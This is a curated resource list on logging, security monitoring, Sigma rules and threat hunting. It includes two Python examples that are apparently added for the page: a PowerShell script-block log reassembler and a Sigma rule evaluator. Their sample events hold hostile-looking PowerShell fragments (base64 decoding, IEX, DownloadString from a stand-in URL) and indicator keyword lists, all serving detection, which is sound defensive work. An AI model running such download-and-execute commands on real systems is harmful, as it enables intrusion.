Logging(Host/Network) / Security Monitoring / Threat Hunting
Table of Contents
- 101
- Logging
- Monitoring
- Detection Engineering
- Threat Hunting
- Data Storage & Analysis
101
Logging
101
- Articles/Writeups
- Talks/Presentations/Videos
General
- Articles/Writeups
Talks/Presentations/Videos
Logging ALL THE THINGS Without All The Cost With Open Source Big Data Tools - DEFCON22 - Zach Fasel
- Many struggle in their job with the decision of what events to log in battle against costly increases to their licensing of a commercial SIEM or other logging solution. Leveraging the open source solutions used for "big-data" that have been proven by many can help build a scalable, reliable, and hackable event logging and security intelligence system to address security and (cringe) compliance requirements. We’ll walk through the various components and simple steps to building your own logging environment that can extensively grow (or keep sized just right) with just additional hardware cost and show numerous examples you can implement as soon as you get back to work (or home).
Non-OS
Bandwidth
bmon - bandwidth monitor and rate estimator
- bmon is a monitoring and debugging tool to capture networking related statistics and prepare them visually in a human friendly way. It features various output methods including an interactive curses user interface and a programmable text output for scripting.
ESXi
- Articles/Writeups
Tools
sexilog
- SexiLog is a specific ELK virtual appliance designed for vSphere environment
Slack
Slack API Auditor
- Provides a quick method of collecting Slack access logs and integration logs, then forwards them via Logstash.
Linux
- 101
- Articles/Writeups
- Understanding
Tools
syslog-ng
- syslog-ng is an enhanced log daemon, supporting a wide range of input and output methods: syslog, unstructured text, message queues, databases (SQL and NoSQL alike) and more.
macOS/OS X
101
How long does your Mac keep its log for? - hoakley(2020)
- "macOS keeps around 52 tracev3 log files in /var/db/diagnostics/Persist, so the active log extends back as long as it has taken to write those"
- Capturing the moment in your log: how to identify a problem - hoakley(2019)
- Making your own logarchive from a backup - hoakley
Tools
- T2M2, Ulbow, Consolation and log utilities - hoakley
UnifiedLogReader
- A parser for Unified logging tracev3 files
OSXMon
- Small project demonstrating log collection using SUpraudit + splunk
SUpraudit
- RE'd praudit rewrite by Jonathan Levin
Understanding
Articles/Blogposts/Writeups
- Starting up in Catalina: sequence and waypoints in the log - hoakley(2019)
- When did my Mac last start up, and why? An exploration with Ulbow - hoakley(2020)
- Mac shutdown and sleep cause codes - hoakley
- RunningBoard: a new subsystem in Catalina to detect errors - hoakley(2019)
- How RunningBoard tracks every app, and manages some - hoakley(2019)
Introducing 'Analysis of Apple Unified Logs: Quarantine Edition' [Entry 0] - Sarah Edwards
- Check out the whole series.
Unified Log
- 101
Articles/Blogposts/Writeups
- macOS Unified log: 1 why, what and how - hoakley(2018)
- macOS Unified log: 2 content and extraction - hoakley
- macOS Unified log: 3 finding your way - hoakley
- Inside Catalina’s unified log: how has it changed? - hoakley(2019)
- How to use the unified log to see what’s going wrong - hoakley(2018)
- Logs Unite! Forensic Analysis Of Apple Unified Logs - Sarah Edwards(2017)
Talks/Presentations/Videos
Unified Logging and Activity Tracing - AppleWWDC2018
- The new Unified Logging and Tracing System for iOS and macOS uses Activity Tracing for performance, consolidates kernel and user-space logging, and has many other improvements. Learn how Logging and Tracing can help you debug and troubleshoot issues with your apps.
Endpoint Security Framework
- Articles/Blogposts/Writeups
OpenBSM
- Articles/Blogposts/Writeups
Talks/Videos/Presentations
Getting Cozy With OpenBSM Auditing On MacOS - Patrick Wardle(Shmoocon2018)
- With the demise of dtrace on macOS, and Apple’s push to rid the kernel of 3rd-party kexts, another option is needed to perform effective auditing on macOS. Lucky for us, OpenBSM fits the bill. Though quite powerful, this auditing mechanism is rather poorly documented and suffered from a variety of kernel vulnerabilities. In this talk, we’ll begin with an introductory overview of OpenBSM’s goals, capabilities, and components before going ‘behind-the-scenes’ to take a closer look at its kernel-mode implementation. Armed with this understanding, we’ll then detail exactly how to build powerful user-mode macOS monitoring utilities such as file, process, and networking monitors based on the OpenBSM framework and APIs. Next we’ll don our hacker hats and discuss a handful of kernel bugs discovered during a previous audit of the audit subsystem (yes, quite meta): a subtle off-by-one read error, a botched patch that turned the off-by-one into a kernel info leak, and finally an exploitable heap overflow. Though now patched, the discussion of these bugs provides an interesting ‘case-study’ of finding and exploiting several types of bugs that lurked within the macOS kernel for many years.
- Process Creation
101
Windows
- 101
- General Articles/Overview aka How to use Event Viewer
Auditing/Audit Events
Windows 10 and Windows Server 2016 security auditing and monitoring reference - microsoft.com
- This reference details most advanced security audit events for Windows 10 and Windows Server 2016.
Windows security audit events - ms.com
- This spreadsheet details the security audit events for Windows.
- Cheat Sheets
Command Line Auditing
- Command line process auditing - docs.ms(2017)
- Microsoft security advisory: Update to improve Windows command-line auditing: February 10, 2015
- [Audit Process Creation - docs.ms](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn319093(v=ws.11))
- Prior to Win10
Command line process auditing - docs.ms(2017)
- 'Applies To: Windows Server 2016, Windows Server 2012 R2'
- Note: enabling Audit Process Creation on its own produces event 4688 without the command line. The "Include command line in process creation events" policy (registry value ProcessCreationIncludeCmdLine_Enabled under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit) must also be set, and on Windows 8.1/Server 2012 R2 that policy only exists after the February 2015 update (KB3004375) referenced above.
Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon(BHAsia2018)
- "In this presentation, I will dive deep into cmd[.]exe's multi-faceted obfuscation opportunities beginning with carets, quotes and stdin argument hiding. Next I will extrapolate more complex techniques including FIN7's string removal/replacement concept and two never-before-seen obfuscation and full encoding techniques – all performed entirely in memory by cmd[.]exe. Finally, I will outline three approaches for obfuscating binary names from static and dynamic analysis while highlighting lesser-known cmd[.]exe replacement binaries."
- Event Collector
Event Forwarding
101
- Introduction to Windows Event Forwarding
- Windows Event Collector - docs.ms
Using Windows Event Collector - docs.ms
- This section lists the topics that explain the tasks that can be accomplished using the Windows Event Collector SDK.
- Windows Event Forwarding - Centralized logging for everyone! (Even if you already have centralized logging!) - Jessica Payne(2015)
Use Windows Event Forwarding to help with intrusion detection - docs.ms(2019)
- Learn about an approach to collect events from devices in your organization. This article talks about events in both normal operations and when an intrusion is suspected.
- Creating Custom Windows Event Forwarding Logs - docs.ms
- Monitoring what matters – Windows Event Forwarding for everyone (even if you already have a SIEM.) - docs.ms(2015)
Articles/Writeups
Windows Event Logging and Forwarding - Australian Cybersecurity Center
- This document has been developed as a guide to the setup and configuration of Windows event logging and forwarding. This advice has been developed to support both the detection and investigation of malicious activity by providing an ideal balance between the collection of important events and management of data volumes. This advice is also designed to complement existing host-based intrusion detection and prevention systems. This document is intended for information technology and information security professionals. It covers the types of events which can be generated and an assessment of their relative value, centralised collection of event logs, the retention of event logs, and recommended Group Policy settings along with implementation notes.
- Paper - 2019
- Australian Cyber Security Center's Windows Event Logging repository
Windows Event Forwarding Guidance - Palantir
- Over the past few years, Palantir has maintained an internal Windows Event Forwarding (WEF) pipeline for generating and centrally collecting logs of forensic and security value from Microsoft Windows hosts. Once these events are collected and indexed, alerting and detection strategies (ADS) can be constructed not only on high-fidelity security events (e.g. log deletion), but also for deviations from normalcy, such as unusual service account access, access to sensitive filesystem or registry locations, or installation of malware persistence. The goal of this project is to provide the necessary building blocks for organizations to rapidly evaluate and deploy WEF to a production environment, and centralize public efforts to improve WEF subscriptions and encourage adoption. While WEF has become more popular in recent years, it is still dramatically underrepresented in the community, and it is our hope that this project may encourage others to adopt it for incident detection and response purposes. We acknowledge the efforts that Microsoft, IAD, and other contributors have made to this space and wish to thank them for providing many of the subscriptions, ideas, and techniques that will be covered in this post.
Event-Forwarding-Guidance - NSA
- Configuration guidance for implementing collection of security relevant Windows Event Log events by using Windows Event Forwarding.
- Windows Event Forwarding for Network Defense - Palantir
- End-Point Log Consolidation with Windows Event Forwarder - Derek Banks(2017)
- The Windows Event Forwarding Survival Guide - Chris Long(2017)
- Setting up Windows Event Forwarder Server (WEF) (Domain) Part 1/3 - Pablo Delgado(2017)
- Custom Logs
- Filtering/XPath
- Tools
Event Log
- 101
Reference for Logs
My Event Log
- Searchable database of Windows Event log entries.
- Windows Event Log Encyclopedia - ultimatewindowsecurity.com
Articles/Writeups
- Get-EventLog shows wrong maximum size of event logs - Przemyslaw Klys(2018)
- Use Windows Event Forwarding to help with intrusion detection - docs.ms
- Windows Event Log Zero 2 Hero Slides
- Advanced Audit Policy – which GPO corresponds with which Event ID - girl-germs.com
- Windows Event Logging for Insider Threat Detection - Derrick Spooner(2019)
JPCert Tool Analysis Result Sheet
- This site summarizes the results of examining the logs Windows records when each of 49 tools likely to be used by an attacker who has infiltrated a network is executed. It was confirmed that traces of tool execution are most likely to be left in event logs, so examination of event logs is the main focus.
Understanding
EVTX and Windows Event Logging - Brandon Charter(2008)
- This paper will explore Microsoft’s EVTX log format and Windows Event Logging framework.
- Event Log File Format - docs.ms
- [MS-EVEN6]: EventLog Remoting Protocol Version 6.0 - docs.ms
- Talks/Presentations/Videos
Tools
EventLogParser
- Parse PowerShell and Security event logs for sensitive information.
libevtx
- Library and tools to access the Windows XML Event Log (EVTX) format
python-evtx
- python-evtx is a pure Python parser for recent Windows Event Log files (those with the file extension ".evtx"). The module provides programmatic access to the File and Chunk headers, record templates, and event entries.
Event Tracing for Windows
- 101
Articles/Blogposts/Writeups
- ETW Event Tracing for Windows and ETL Files - Nicole Ibrahim
- SilkETW: Because Free Telemetry is … Free! - Ruben Boonen
- Tampering with Windows Event Tracing: Background, Offense, and Defense - Palantir
- Getting started with Event Tracing for Windows in C# - Alex Khanin
Event Tracing for Windows and Network Monitor
- "Event Tracing for Windows, (ETW), has been around for quite a while now as it was introduced in Windows 2000. It's basically instrumented logging that describes what a component is doing. Conceptually, it's something like the proverbial printf("here1") concept used by programmers, but it is present in retail builds. When you enable logging in a component the result is an ETL (Event Trace Log) file. What's new is that that Network Monitor can read any ETL file. And with the supplied parsers many network oriented ETW providers can be decoded."
Talks/Videos
- Production tracing with Event Tracing for Windows (ETW) - Doug Cook
ETW - Monitor Anything, Anytime, Anywhere - Dina Goldshtein(NDC Oslo 2017)
- You’ll learn how to diagnose incredibly complex issues in production systems such as excessive garbage collection pauses, slow startup due to JIT and disk accesses, and even sluggishness during the Windows boot process. We will also explore some ways to automate ETW collection and analysis to build self-diagnosing applications that identify high CPU issues, resource leaks, and concurrency problems and produce alerts and reports. In the course of the talk we will use innovative performance tools that haven’t been applied to ETW before — flame graphs for visualising call stacks and a command-line interface for dynamic, scriptable ETW tracing. ETW is truly a window into everything happening on your system, and it doesn’t require expensive licenses, invasive tools, or modifying your code in any way. It is a critical, first-stop skill on your way to mastering application performance and diagnostics.
Windows Forensics: Event Trace Logs - Nicole Ibrahim(SANS DFIR Summit 2018)
- This talk will cover what ETL files are and where you can expect to find them, how to decode ETL files, caveats associated with those files, and some interesting and forensically relevant data that ETL files can provide.
Tools
SilkETW & SilkService
- SilkETW & SilkService are flexible C# wrappers for ETW, they are meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While both projects have obvious defensive (and offensive) applications they should primarily be considered as research tools. For easy consumption, output data is serialized to JSON. The JSON data can either be written to file and analyzed locally using PowerShell, stored in the Windows eventlog or shipped off to 3rd party infrastructure such as Elasticsearch.
- Logon Events
- Parsing
PowerShell
101
- PowerShell ♥ the Blue Team - PowerShell Team(2015)
About Group Policy Settings - docs.ms
- Describes the Group Policy settings for Windows PowerShell
- Windows PowerShell Logging CheatSheet - Malware Archaeology
- Articles/Blogposts/Writeups
Event Log
About Eventlogs - docs.ms
- Windows PowerShell creates a Windows event log that is named "Windows PowerShell" to record Windows PowerShell events. You can view this log in Event Viewer or by using cmdlets that get events, such as the Get-EventLog cmdlet. By default, Windows PowerShell engine and provider events are recorded in the event log, but you can use the event log preference variables to customize the event log. For example, you can add events about Windows PowerShell commands.
- PowerShell – Everything you wanted to know about Event Logs and then some - Przemyslaw Klys(2019)
- Script Block Logging
- Transcript Logging
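For the Script Block Logging entry: a script block larger than one event is written to Microsoft-Windows-PowerShell/Operational as several 4104 events that share a ScriptBlockId and carry MessageNumber/MessageTotal, and PowerShell 5 also writes blocks it considers suspicious at Warning level (3) even when script block logging is not switched on. The following reassembler is an added example for this page, not code from block-parser or any other tool listed here. The XML is constructed to mirror those EventData field names, the ScriptBlockId values and the http://example.invalid URL are made up, and the indicator strings are an illustrative assumption.

```python
"""Reassemble PowerShell 4104 script block fragments from an XML export and
flag blocks that were cut by log rollover (added example, constructed data)."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumption: illustrative indicator list, not a vetted ruleset.
INDICATORS = ("frombase64string", "invoke-expression", "iex ", "downloadstring")

# Constructed export: one block in two fragments (arriving out of order), one
# block whose first and last fragments were already overwritten, one benign block.
SAMPLE_XML = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4104</EventID><Level>3</Level>
 <TimeCreated SystemTime="2020-05-01T10:00:02Z"/><Computer>WKS01</Computer></System>
 <EventData><Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>
 <Data Name="ScriptBlockText">IEX ([Text.Encoding]::Unicode.GetString($b))</Data>
 <Data Name="ScriptBlockId">1111-aaaa</Data><Data Name="Path"></Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4104</EventID><Level>3</Level>
 <TimeCreated SystemTime="2020-05-01T10:00:01Z"/><Computer>WKS01</Computer></System>
 <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
 <Data Name="ScriptBlockText">$b = [Convert]::FromBase64String('SQBFAFgA');</Data>
 <Data Name="ScriptBlockId">1111-aaaa</Data><Data Name="Path"></Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4104</EventID><Level>5</Level>
 <TimeCreated SystemTime="2020-05-01T10:00:03Z"/><Computer>WKS01</Computer></System>
 <EventData><Data Name="MessageNumber">2</Data><Data Name="MessageTotal">3</Data>
 <Data Name="ScriptBlockText">$c = (New-Object Net.WebClient).DownloadString('http://example.invalid/x');</Data>
 <Data Name="ScriptBlockId">2222-bbbb</Data><Data Name="Path"></Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>4104</EventID><Level>5</Level>
 <TimeCreated SystemTime="2020-05-01T10:00:04Z"/><Computer>WKS01</Computer></System>
 <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
 <Data Name="ScriptBlockText">Get-ChildItem C:\\Temp</Data>
 <Data Name="ScriptBlockId">3333-cccc</Data><Data Name="Path">C:\\scripts\\clean.ps1</Data></EventData>
</Event>
</Events>"""


def parse_4104(xml_text):
    """Return one dict per 4104 event with the fields needed for reassembly."""
    frags = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        frags.append({
            "id": data["ScriptBlockId"],
            "num": int(data["MessageNumber"]),
            "total": int(data["MessageTotal"]),
            "text": data["ScriptBlockText"],
            "path": data.get("Path", ""),
            "level": int(ev.findtext("e:System/e:Level", default="0", namespaces=NS)),
        })
    return frags


def reassemble(frags):
    """Join fragments per ScriptBlockId in MessageNumber order and record gaps."""
    blocks = {}
    for f in sorted(frags, key=lambda f: (f["id"], f["num"])):
        b = blocks.setdefault(f["id"], {"parts": {}, "total": f["total"],
                                         "path": f["path"], "warning": False})
        b["parts"][f["num"]] = f["text"]
        b["warning"] = b["warning"] or f["level"] == 3   # PowerShell's own suspicion flag
    result = {}
    for sid, b in blocks.items():
        missing = [n for n in range(1, b["total"] + 1) if n not in b["parts"]]
        result[sid] = {"text": "".join(b["parts"][n] for n in sorted(b["parts"])),
                       "complete": not missing, "missing": missing,
                       "path": b["path"], "warning": b["warning"]}
    return result


def suspicious_ids(blocks):
    """Ids that hit an indicator or that PowerShell logged at Warning level."""
    return sorted(sid for sid, b in blocks.items()
                  if b["warning"] or any(i in b["text"].lower() for i in INDICATORS))


if __name__ == "__main__":
    for sid, block in reassemble(parse_4104(SAMPLE_XML)).items():
        print(sid, "complete" if block["complete"] else f"missing {block['missing']}",
              block["text"][:60])
```

The "missing" list is the detail worth alerting on: an incomplete block means the Operational log has already wrapped, so the default size of that log is too small for the host's PowerShell volume, which is exactly the scaling problem the WWHF19 talk below discusses.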
Talks/Presentations/Videos
When Logging Everything Becomes an Issue - Edward Ruprecht(WWHF19)
- Slides
- Discusses potential issues with logging Sysmon and PowerShell logs: sensitive data leakage, best practices, and scalability.
Invoke-Obfuscation: PowerShell obFUsk8tion - Daniel Bohannon(Hacktivity2016)
- "Today’s detection techniques monitor for certain strings in powershell.exe’s command-line arguments. While this provides tremendous value for most of today’s PowerShell attacks, I will introduce over a dozen obfuscation techniques that render today’s detection techniques grossly ineffective. These techniques will enable the innovative Red Team to continue using PowerShell undetected while challenging the Blue Team to identify these attacks more effectively. Finally, I will unveil Invoke-Obfuscation.ps1 which will enable both Red and Blue Teams to effortlessly create highly obfuscated PowerShell commands so organizations can test their detection capabilities against these obfuscation techniques."
Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science - Daniel Bohannon(BHUSA2017)
- Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, PowerShell being a Windows-signed binary native on Windows 7 and later that enables reflective injection of binaries and DLLs and memory-resident execution of remotely hosted scripts has made it increasingly attractive for attackers and commodity malware authors alike. In environments where PowerShell is heavily used, filtering out legitimate activity to detect malicious PowerShell usage is not trivial.
Malicious payloads vs. deep visibility: a PowerShell story - Daniel Bohannon(PSConEU2019)
- "This talk draws from over four years of Incident Response experience to lay out a technical buffet of in-the-wild malicious PowerShell payloads and techniques. In addition to diving deep into the mechanics of each malicious example, this presentation will highlight forensic artifacts, detection approaches and the deep visibility that the latest versions of PowerShell provides security practitioners to defend their organizations against the latest attacks that utilize PowerShell. So if you are new to security or just want to learn about how attackers have used PowerShell in their attacks, then this talk is for you. If you want to see what obfuscated and multi-stage, evasive PowerShell-based attacks look like under the microscope of PowerShell deep inspection capabilities, this talk is for you. And if you want to see why these security advancements to PowerShell are causing many attackers to shift their tradecraft development away from PowerShell, this talk is for you."
Tools
check_ioc
- Check_ioc is a script to check for various, selectable indicators of compromise on Windows systems via PowerShell and Event Logs. It was primarily written to be run on a schedule from a monitoring engine such as Nagios, however, it may also be run from a command-line (for incident response).
Get-InjectedThread.ps1
- Looks for threads that were created as a result of code injection.
- PowerShellMethodAuditor
Revoke-Obfuscation - Github
- Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework.
GetInjectedThreads.ps1
- Looks for threads that were created as a result of code injection.
block-parser
- Parser for Windows PowerShell script block logs
EventList
- EventList is a tool to help improve your audit capabilities and to help build your Security Operations Center. It combines Microsoft Security Baselines with MITRE ATT&CK and generates hunting queries for your SIEM system, regardless of the product used.
GENE: Go Evtx sigNature Engine
- The idea behind this project is to provide an efficient and standard way to look into Windows Event Logs (a.k.a. EVTX files). For those who are familiar with YARA, it can be seen as a YARA-like engine for looking for information in Windows Events.
WMI
WMI-IDS
- WMI-IDS is a proof-of-concept agent-less host intrusion detection system designed to showcase the unique ability of WMI to respond to and react to operating system events in real-time.
Monitoring
101
Articles/Blogposts/Writeups
- Crown Jewels: Monitoring vs Mitigating - Pen Consultants
Introducing the Funnel of Fidelity - Jared Atkinson(2019)
- [...]As a result, I created a model to describe the conceptual process that organizations follow to quantify the high level roles and responsibilities of a detection and response program. As events pass through the model the depth of event analysis and fidelity is increased. For this reason I call the model the Funnel of Fidelity (following the naming convention of David Bianco’s Pyramid of Pain).
- Talks/Presentations/Videos
Breach Detection/Response
- Articles/Blogposts/Presentations/Talks/Writeups
Tools
Infection Monkey
- The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Command and Control (C&C) server.
411
- Configure Searches to periodically run against a variety of data sources. You can define a custom pipeline of Filters to manipulate any generated Alerts and forward them to multiple Targets.
Pattern
- Pattern is a web mining module for Python. It has tools for: Data Mining (web services such as Google, Twitter and Wikipedia, a web crawler, an HTML DOM parser); Natural Language Processing (part-of-speech taggers, n-gram search, sentiment analysis, WordNet); Machine Learning (vector space model, clustering, classification with KNN, SVM and Perceptron); Network Analysis (graph centrality and visualization).
File Analysis
BinaryAlert
- BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spreads.
Infrastructure Monitoring
Ninja Level Infrastructure Monitoring Workshop - Defcon24
- This repository contains all the presentation, documentation and the configuration, sample logs, ansible playbook, customized dashboards and more.
Network-based
- 101
- Articles/Writeups
Talks/Presentations
Passive IPS Reconnaissance and Enumeration - false positive (ab)use - Arron Finnon
- Network Intrusion Prevention Systems or NIPS have been plagued by "False Positive" issues almost since their first deployment. A "False Positive" could simply be described as incorrectly or mistakenly detecting a threat that is not real. A large amount of research has gone into using "False Positive" as an attack vector either to attack the very validity of an IPS system or to conduct forms of Denial of Service attacks. However the very reaction to a "False Positive" in the first place may very well reveal more detailed information about defences than you might well think.
- You Pass Butter: Next Level Security Monitoring Through Proactivity
- Understanding
Sigma
Sigma
- Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others. Sigma is for log files what Snort is for network traffic and YARA is for files.
- Sigma Specification
- How to Write Sigma Rules - Florian Roth
Sigma - Generic Signatures for Log Events - Thomas Patzke(Hack.lu2017)
- Log files are a great resource for hunting threats and analysis of incidents. Unfortunately, there is no standardized signature format like YARA for files or Snort signatures for network traffic. This makes sharing of log signatures by security researchers and software developers problematic. Further, most SIEM systems have their own query language, which makes signature distribution in large heterogeneous environments inefficient and increases costs for replacement of SIEM solutions. Sigma tries to fill these gaps by providing a YAML-based format for log signatures, an open repository of signatures and an extensible tool that converts Sigma signatures into different query languages. Rules and tools were released as open source and are actively developed. This presentation gives an overview about use cases, Sigma rules and the conversion tool, the development community and future plans of the project.
MITRE ATT&CK and Sigma Alerting - Justin Henderson, John Hubbard(2019)
- This webcast will introduce the Sigma Alert project and show examples of creating alert rules against MITRE ATT&CK framework items to discover attacks in a way that works for multiple products. Sigma allows for writing rules in a neutral rule format that supports converting the rule to support your product of choice.
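A minimal Sigma evaluator, added here as an example for the Sigma entries above; it is not the project's own sigmac/pySigma converter and covers only the subset of the specification it comments on: field maps (AND across fields, OR across a list of values), the contains/startswith/endswith/all modifiers, plain values with * wildcards, and conditions built from and/or/not. The rule is the Python equivalent of the YAML shown in the comment so that no YAML library is needed, the filter's parent process path (monitoringagent.exe) is an assumed benign value, and the events are constructed in Sysmon field naming.

```python
"""Evaluate a Sigma rule against in-memory events (added example; a subset of
the Sigma specification, not the project's converter)."""
import fnmatch

# Python form of this YAML rule:
#   title: Encoded PowerShell Command Line
#   logsource: {product: windows, category: process_creation}
#   detection:
#     selection:
#       Image|endswith: ['\powershell.exe', '\pwsh.exe']
#       CommandLine|contains: [' -enc ', ' -encodedcommand ']
#     filter:
#       ParentImage|endswith: '\monitoringagent.exe'   # assumed benign parent
#     condition: selection and not filter
#   level: high
RULE = {
    "title": "Encoded PowerShell Command Line",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": [" -enc ", " -encodedcommand "],
        },
        "filter": {"ParentImage|endswith": "\\monitoringagent.exe"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed events (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgA",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand SQBFAFgA",
     "ParentImage": r"C:\Program Files\Vendor\monitoringagent.exe"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh.exe -NoProfile -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo -enc ",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _match_value(value, pattern, mods):
    if value is None:                      # absent field never matches
        return False
    v, p = str(value).lower(), str(pattern).lower()   # Sigma matching is case-insensitive
    if "contains" in mods:
        return p in v
    if "startswith" in mods:
        return v.startswith(p)
    if "endswith" in mods:
        return v.endswith(p)
    return fnmatch.fnmatchcase(v, p)       # plain value: '*' and '?' wildcards


def _match_map(field_map, event):
    for key, patterns in field_map.items():
        field, *mods = key.split("|")
        values = patterns if isinstance(patterns, list) else [patterns]
        matcher = all if "all" in mods else any        # a list is OR unless |all
        if not matcher(_match_value(event.get(field), v, mods) for v in values):
            return False                                # fields are ANDed
    return True


def match_search(search, event):
    """A search identifier is a map (AND of fields) or a list of maps (OR)."""
    if isinstance(search, list):
        return any(_match_map(m, event) for m in search)
    return _match_map(search, event)


def eval_condition(condition, results):
    """Recursive-descent evaluation of 'a and not b or c' style conditions
    (precedence: not, and, or; no parentheses or 'N of' forms)."""
    tokens = condition.split()
    pos = 0

    def parse_or():
        nonlocal pos
        value = parse_and()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            rhs = parse_and()              # always consume, never short-circuit
            value = value or rhs
        return value

    def parse_and():
        nonlocal pos
        value = parse_not()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            rhs = parse_not()
            value = value and rhs
        return value

    def parse_not():
        nonlocal pos
        if tokens[pos] == "not":
            pos += 1
            return not parse_not()
        name = tokens[pos]
        pos += 1
        return results[name]

    return parse_or()


def run_rule(rule, events):
    """Indices of the events the rule fires on."""
    det = rule["detection"]
    searches = {k: v for k, v in det.items() if k != "condition"}
    return [i for i, ev in enumerate(events)
            if eval_condition(det["condition"],
                              {name: match_search(s, ev) for name, s in searches.items()})]


if __name__ == "__main__":
    print(RULE["title"], "->", run_rule(RULE, EVENTS))
```

Running it fires only on the first event: the second is suppressed by the filter, the third has no encoded command, and the fourth contains the string but is not a PowerShell image. That last case is why the rule keys on Image as well as CommandLine; a backend conversion that drops one of the two fields (because the target product lacks it) silently widens or narrows the rule, so check the converted query, not just the YAML.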
IDS/IPS Tools
Snort
Snort
- A free lightweight network intrusion detection system for UNIX and Windows.
- Snort FAQ
- Snort User Manual
- Snort Documentation
Bro/Zeek
101
Zeek
- Zeek is an open source software platform that provides compact, high-fidelity transaction logs, file content, and fully customized output to analysts, from the smallest home office to the largest, fastest research and commercial networks.
- Zeek Quick Start Guide
- Zeek Documentation
- Try Zeek in your browser!
- Writing Zeek Scripts
- Articles/Blogposts
Tools
bro-intel-generator
- Script for generating Bro intel files from pdf or html reports
bro-domain-generation
- Detect domain generation algorithms (DGA) with Bro. The module will regularly generate domains by any implemented algorithms and watch for those domains in DNS queries. This script only works with Bro 2.1+.
Exfil Framework
- The Exfil Framework is a suite of Bro scripts that detect file uploads in TCP connections. The Exfil Framework can detect file uploads in most TCP sessions including sessions that have encrypted payloads (SCP, SFTP, HTTPS).
brim
- Desktop application to efficiently search large packet captures and Zeek logs.
Suricata
Suricata
- Suricata is a high performance Network IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF).
- Suricata Documentation
Argus
Argus
- Argus is an open source layer 2+ auditing tool (including IP audit) written by Carter Bullard which has been under development for over 10 years.
- Argus on NSM Wiki
- Argus FAQ
- Argus How-To
- Argus Manual
Other
Maltrail
- Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).
IDS/IPS Monitoring Tools
- Snorby
Snorby - Github
- Snorby is a ruby on rails web application for network security monitoring that interfaces with current popular intrusion detection systems (Snort, Suricata and Sagan). The basic fundamental concepts behind Snorby are simplicity, organization and power. The project goal is to create a free, open source and highly competitive application for network monitoring for both private and enterprise use.
Sguil
- Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides access to realtime events, session data, and raw packet captures. Sguil facilitates the practice of Network Security Monitoring and event driven analysis. The Sguil client is written in tcl/tk and can be run on any operating system that supports tcl/tk (including Linux, *BSD, Solaris, MacOS, and Win32).
- Sguil FAQ
Squert
- Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.
- Slide Deck on Squert
- Install/setup/etc - Github
General Tools
General
Security Onion
- Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, Snorby, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!
Data Tranformation
-
Pip3line, the Swiss army knife of byte manipulation
- Pip3line is a raw bytes manipulation utility, able to apply well known and less well known transformations from anywhere to anywhere (almost).
-
dnstwist
- Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
-
